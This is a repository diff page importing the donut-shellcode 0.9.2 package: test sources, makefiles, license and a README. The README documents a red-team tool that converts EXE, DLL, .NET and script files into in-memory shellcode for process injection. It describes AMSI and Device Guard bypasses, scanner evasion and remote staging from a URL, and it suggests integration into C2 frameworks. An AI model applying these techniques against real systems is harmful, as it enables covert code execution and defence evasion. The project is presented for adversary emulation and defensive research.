Codebase list donut-shellcode / caa7b83
New upstream version 0.9.2 Sophie Brun 4 years ago
81 changed file(s) with 15998 addition(s) and 0 deletion(s). Raw diff Collapse all Expand all
+56
-0
DonutTest/hello.c less more
0 #define UNICODE
1
2 #include <stdint.h>
3 #include <stdio.h>
4 #include <stdlib.h>
5 #include <string.h>
6 #include <sys/stat.h>
7 #include <inttypes.h>
8
9 #include <windows.h>
10 #pragma comment(lib, "user32.lib")
11 #pragma comment(lib, "shell32.lib")
12
13 __declspec(dllexport)
14 VOID WINAPI RunProcess(PWCHAR proc1, PWCHAR proc2) {
15 PROCESS_INFORMATION pi;
16 STARTUPINFO si;
17
18 ZeroMemory(&si, sizeof(si));
19 si.cb = sizeof(si);
20 CreateProcess(NULL, proc1, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
21
22 ZeroMemory(&si, sizeof(si));
23 si.cb = sizeof(si);
24 CreateProcess(NULL, proc2, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
25 }
26
27 __declspec(dllexport)
28 VOID WINAPI DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
29 WCHAR msg[4096];
30
31 _snwprintf(msg, ARRAYSIZE(msg),
32 L"param[0] : %ws\r"
33 L"param[1] : %ws\r"
34 L"param[2] : %ws\r"
35 L"param[3] : %ws\r",
36 arg0, arg1, arg2, arg3);
37
38 MessageBox(NULL, msg, L"Donut Test", MB_OK);
39 }
40
41 __declspec(dllexport)
42 BOOL WINAPI DllMain(HMODULE hModule,
43 DWORD ul_reason_for_call,
44 LPVOID lpReserved) {
45 switch (ul_reason_for_call) {
46 case DLL_PROCESS_ATTACH:
47 MessageBox(NULL, L"Hello, World!", L"Hello, World!", 0);
48 break;
49 case DLL_THREAD_ATTACH:
50 case DLL_THREAD_DETACH:
51 case DLL_PROCESS_DETACH:
52 break;
53 }
54 return TRUE;
55 }
+88
-0
DonutTest/testcase.c less more
0
1
2 // just some simple test cases to use with donut library
3
4 #include "donut.h"
5
6 typedef struct _test_case_t {
7 int arch;
8 int bypass;
9 int inst_type;
10 char *domain;
11 char *cls;
12 char *method;
13 char *param;
14 char *file;
15 char *url;
16 char *runtime;
17 int err; // expected result based on test case
18 } test_case;
19
20 test_case tests[] = {
21 // nothing supplied
22 {0,0,0,"","","","","","","",DONUT_ERROR_INVALID_PARAMETER},
23 // requesting x86 shellcode for x64 DLL
24 {DONUT_ARCH_X86,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","cls","method","param","hello_amd64.dll","","",DONUT_ERROR_ARCH_MISMATCH},
25 // requesting x64 shellcode for x86 DLL
26 {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","","","hello_x86.dll","","",DONUT_ERROR_ARCH_MISMATCH},
27 // supplying parameters for unmanaged DLL, but not function name
28 {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","","calc.exe,notepad.exe","hello_amd64.dll","","",DONUT_ERROR_DLL_PARAM},
29 // supplying function name that can't be found in DLL
30 {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","NoMethod","calc.exe,notepad.exe","hello_amd64.dll","","",DONUT_ERROR_DLL_FUNCTION},
31 // supplying file that isn't recognized
32 {DONUT_ARCH_ANY,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"","","","","/dev/null","","",DONUT_ERROR_FILE_INVALID},
33 // .NET DLL assembly with no method provided
34 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","TestClass","","","class1.dll","","",DONUT_ERROR_NET_PARAMS},
35 // .NET DLL assembly with no class provided
36 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","RunProcess","calc.exe,notepad.exe","class1.dll","","",DONUT_ERROR_NET_PARAMS},
37 // .NET DLL with good parameters
38 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","","",DONUT_ERROR_SUCCESS},
39 // invalid URL
40 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","http:","",DONUT_ERROR_INVALID_URL},
41 // invalid URL length
42 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","http://","",DONUT_ERROR_URL_LENGTH},
43 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","https://","",DONUT_ERROR_URL_LENGTH},
44 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","https://a","",DONUT_ERROR_SUCCESS},
45 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll",
46 "https://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
47 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
48 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
49 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
50 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
51 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
52 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
53 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
54 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
55 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
56 "",DONUT_ERROR_URL_LENGTH},
57 };
58
59 int main(void)
60 {
61 DONUT_CONFIG c;
62 int err, i;
63
64 for(i=0; i<sizeof(tests)/sizeof(test_case); i++) {
65 memset(&c, 0, sizeof(c));
66
67 c.arch = tests[i].arch;
68 c.bypass = tests[i].bypass;
69 c.inst_type = tests[i].inst_type;
70
71 strncpy(c.domain , tests[i].domain, sizeof(c.domain) - 1);
72 strncpy(c.cls , tests[i].cls, sizeof(c.cls) - 1);
73 strncpy(c.method , tests[i].method, sizeof(c.method) - 1);
74 strncpy(c.param , tests[i].param, sizeof(c.param) - 1);
75 strncpy(c.file , tests[i].file, sizeof(c.file) - 1);
76 strncpy(c.url , tests[i].url, sizeof(c.url) - 1);
77 strncpy(c.runtime, tests[i].runtime, sizeof(c.runtime) - 1);
78
79 printf("Test Case # %2i ", (i+1));
80 err = DonutCreate(&c);
81 DonutDelete(&c);
82
83 printf("returned %2i : %s\n",
84 err, err == tests[i].err ? "OK" : "FAILED");
85 }
86 return 0;
87 }
+28
-0
LICENSE less more
0 BSD 3-Clause License
1
2 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
3
4 Redistribution and use in source and binary forms, with or without
5 modification, are permitted provided that the following conditions are met:
6
7 * Redistributions of source code must retain the above copyright notice, this
8 list of conditions and the following disclaimer.
9
10 * Redistributions in binary form must reproduce the above copyright notice,
11 this list of conditions and the following disclaimer in the documentation
12 and/or other materials provided with the distribution.
13
14 * Neither the name of the copyright holder nor the names of its
15 contributors may be used to endorse or promote products derived from
16 this software without specific prior written permission.
17
18 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
19 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
20 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
21 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
22 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
23 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
24 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
25 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
26 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
27 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+9
-0
MANIFEST.in less more
0 include README.md
1 include Makefile*
2 include LICENSE
3 include version-release-notes.txt
4 recursive-include . *.c
5 recursive-include payload *
6 recursive-include include *
7 recursive-include docs *
8 recursive-include lib *
+9
-0
Makefile less more
0 donut:
1 gcc -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut
2 gcc -Wall -c -fpack-struct=8 -fPIC -I include donut.c hash.c encrypt.c payload/clib.c
3 ar rcs lib/libdonut.a donut.o hash.o encrypt.o clib.o
4 gcc -Wall -shared -o lib/libdonut.so donut.o hash.o encrypt.o clib.o
5 debug:
6 gcc -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut
7 clean:
8 rm *.o donut lib/libdonut.a lib/libdonut.so
+6
-0
Makefile.mingw less more
0 donut:
1 x86_64-w64-mingw32-gcc -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut.exe
2 debug:
3 x86_64-w64-mingw32-gcc -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut.exe
4 clean:
5 rm donut.exe *.o
+14
-0
Makefile.msvc less more
0 donut:
1 cl -Zp8 -nologo -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c
2 cl -Zp8 -nologo -DDLL -LD -I include donut.c hash.c encrypt.c payload/clib.c
3 move donut.lib lib/donut.lib
4 move donut.exp lib/donut.exp
5 move donut.dll lib/donut.dll
6 debug:
7 cl -Zp8 -nologo -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c
8 cl -Zp8 -nologo -DDEBUG -DDLL -LD -I include donut.c hash.c encrypt.c payload/clib.c
9 move donut.lib lib/donut.lib
10 move donut.exp lib/donut.exp
11 move donut.dll lib/donut.dll
12 clean:
13 del *.obj *.bin donut.exe lib/donut.exp lib/donut.lib lib/donut.dll
+264
-0
PKG-INFO less more
0 Metadata-Version: 2.1
1 Name: donut-shellcode
2 Version: 0.9.2
3 Summary: Donut Python C extension
4 Home-page: https://github.com/TheWover/donut
5 Author: TheWover, Odzhan, byt3bl33d3r
6 License: UNKNOWN
7 Description: # Using Donut
8
9 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
10
11 Version: 0.9.2 *please submit issues and requests for v1.0 release*
12
13 Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
14
15 TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
16
17 v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/
18
19 ## Introduction
20
21 Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
22
23 It can be used in several ways.
24
25 ## As a Standalone Tool
26
27 Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.
28
29 ```
30
31 usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>
32
33 -MODULE OPTIONS-
34
35 -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.
36 -u <URL> HTTP server that will host the donut module.
37
38 -PIC/SHELLCODE OPTIONS-
39
40 -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
41 -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
42 -o <payload> Output file. Default is "payload.bin"
43
44 -DOTNET OPTIONS-
45
46 -c <namespace.class> Optional class name. (required for .NET DLL)
47 -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)
48 -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
49 -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
50 -d <name> AppDomain name to create for .NET. Randomly generated by default.
51
52 examples:
53
54 donut -f c2.dll
55 donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
56 donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/
57
58 ```
59
60 ### Building Donut
61
62 Tags have been provided for each release version of donut that contain the compiled executables.
63
64 * v0.9.2, Bear Claw:
65 * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
66 * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
67 * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9
68
69 However, you may also clone and build the source yourself using the provided makefiles.
70
71 ## Building From Repository
72
73 From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
74
75 ```
76 git clone http://github.com/thewover/donut
77 cd donut
78 ```
79
80 ## Linux
81
82 Simply run make to generate an executable, static and dynamic libraries.
83
84 ```
85 make
86 make clean
87 make debug
88 ```
89
90 ## Windows
91
92 Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:
93
94 ```
95 nmake -f Makefile.msvc
96 nmake clean -f Makefile.msvc
97 nmake debug -f Makefile.msvc
98 ```
99
100 ## As a Library
101
102 donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
103
104 ## As a Python Module
105
106 Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
107
108 ```
109 pip install .
110 ```
111
112 Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
113
114 ```
115 pip install donut-shellcode
116 ```
117
118 ## As a Template - Rebuilding the shellcode
119
120 *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut.
121
122 ### Microsoft Visual Studio
123
124 **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**
125
126 Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
127
128 ```
129 nmake clean -f Makefile.msvc
130 nmake -f Makefile.msvc
131 ```
132
133 This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
134
135 To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
136
137 ```
138 nmake clean -f Makefile.msvc
139 nmake x86 -f Makefile.msvc
140 ```
141
142 This will save the shellcode as a C array to *payload_exe_x86.h*.
143
144 ### Mingw-w64
145
146 Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
147
148 ```
149 make clean -f Makefile.mingw
150 make -f Makefile.mingw
151 ```
152
153 Once you've recompiled for all architectures, you may rebuild donut.
154
155 ## Bypasses
156
157 Donut includes a bypass system for AMSI and other security features. Currently we bypass:
158
159 * AMSI in .NET v4.8
160 * Device Guard policy preventing dynamicly generated code from executing
161
162 You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c.
163
164 Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.
165
166 Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
167
168 Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
169
170 If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
171
172 Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.
173
174 ### Additional features.
175
176 These are left as exercises to the reader. I would personally recommend:
177
178 * Add environmental keying
179 * Make donut polymorphic by obfuscating *payload* every time shellcode is generated
180 * Integrate donut as a module into your favorite RAT/C2 Framework
181
182 ## Disclaimers
183
184 * No, we will not update donut to counter signatures or detections by any AV.
185 * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.
186
187 # How it works
188
189 ## Procedure for Assemblies
190
191 Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
192
193 The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
194
195 Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
196
197 For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
198
199 Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.
200
201 ## Procedure for ActiveScript/XSL
202
203 The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).
204
205 ## Procedure for PE Loading
206
207 The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).
208
209 ## Components
210
211 Donut contains the following elements:
212
213 * donut.c: The source code for the donut payload generator
214 * donut.exe: The compiled payload generator as an EXE
215 * donut.py: The donut payload generator as a Python script *(planned for version 1.0)*
216 * donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
217 * setup.py: The setup file for installing Donut as a Pip Python3 module.
218 * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform
219 * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform
220 * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project
221 * payload/payload.c: Main file for the shellcode.
222 * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
223 * payload/inmem_pe.c: In-Memory loader for EXE/DLL files.
224 * payload/inmem_xml.c: In-Memory loader for XSL/XML files.
225 * payload/inmem_script.c: In-Memory loader for VBScript/JScript files.
226 * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
227 * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support.
228 * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP)
229 * payload/http_client.c: Downloads a module from remote staging server into memory.
230 * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
231 * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
232 * payload/inject.exe: The compiled C shellcode injector
233 * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing.
234 * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible
235 * payload/runsc.exe: The compiled C shellcode runner
236 * payload/exe2h/exe2h.c: Source code for exe2h
237 * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file
238 * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
239 * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
240
241 # Subprojects
242
243 There are three companion projects provided with donut:
244
245 * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
246 * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
247 * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
248 * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.
249
250 # Project plan
251
252 * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
253 * Create a C# version of the generator.
254 * Create a donut.py generator that uses the same command-line parameters as donut.exe.
255 * Add support for HTTP proxies.
256 ~~* Find ways to simplify the shellcode if possible.~~
257 * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it.
258 * ~~Dynamic Calls to DLL functions.~~
259 * Handle the ProcessExit event from AppDomain using unmanaged code.
260
261 Platform: UNKNOWN
262 Requires-Python: >=3.0
263 Description-Content-Type: text/markdown
+253
-0
README.md less more
0 # Using Donut
1
2 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
3
4 Version: 0.9.2 *please submit issues and requests for v1.0 release*
5
6 Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
7
8 TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
9
10 v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/
11
12 ## Introduction
13
14 Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
15
16 It can be used in several ways.
17
18 ## As a Standalone Tool
19
20 Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.
21
22 ```
23
24 usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>
25
26 -MODULE OPTIONS-
27
28 -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.
29 -u <URL> HTTP server that will host the donut module.
30
31 -PIC/SHELLCODE OPTIONS-
32
33 -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
34 -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
35 -o <payload> Output file. Default is "payload.bin"
36
37 -DOTNET OPTIONS-
38
39 -c <namespace.class> Optional class name. (required for .NET DLL)
40 -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)
41 -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
42 -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
43 -d <name> AppDomain name to create for .NET. Randomly generated by default.
44
45 examples:
46
47 donut -f c2.dll
48 donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
49 donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/
50
51 ```
52
53 ### Building Donut
54
55 Tags have been provided for each release version of donut that contain the compiled executables.
56
57 * v0.9.2, Bear Claw:
58 * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
59 * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
60 * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9
61
62 However, you may also clone and build the source yourself using the provided makefiles.
63
64 ## Building From Repository
65
66 From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
67
68 ```
69 git clone http://github.com/thewover/donut
70 cd donut
71 ```
72
73 ## Linux
74
75 Simply run make to generate an executable, static and dynamic libraries.
76
77 ```
78 make
79 make clean
80 make debug
81 ```
82
83 ## Windows
84
85 Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:
86
87 ```
88 nmake -f Makefile.msvc
89 nmake clean -f Makefile.msvc
90 nmake debug -f Makefile.msvc
91 ```
92
93 ## As a Library
94
95 donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
96
97 ## As a Python Module
98
99 Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
100
101 ```
102 pip install .
103 ```
104
105 Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
106
107 ```
108 pip install donut-shellcode
109 ```
110
111 ## As a Template - Rebuilding the shellcode
112
113 *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut.
114
115 ### Microsoft Visual Studio
116
117 **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**
118
119 Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
120
121 ```
122 nmake clean -f Makefile.msvc
123 nmake -f Makefile.msvc
124 ```
125
126 This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
127
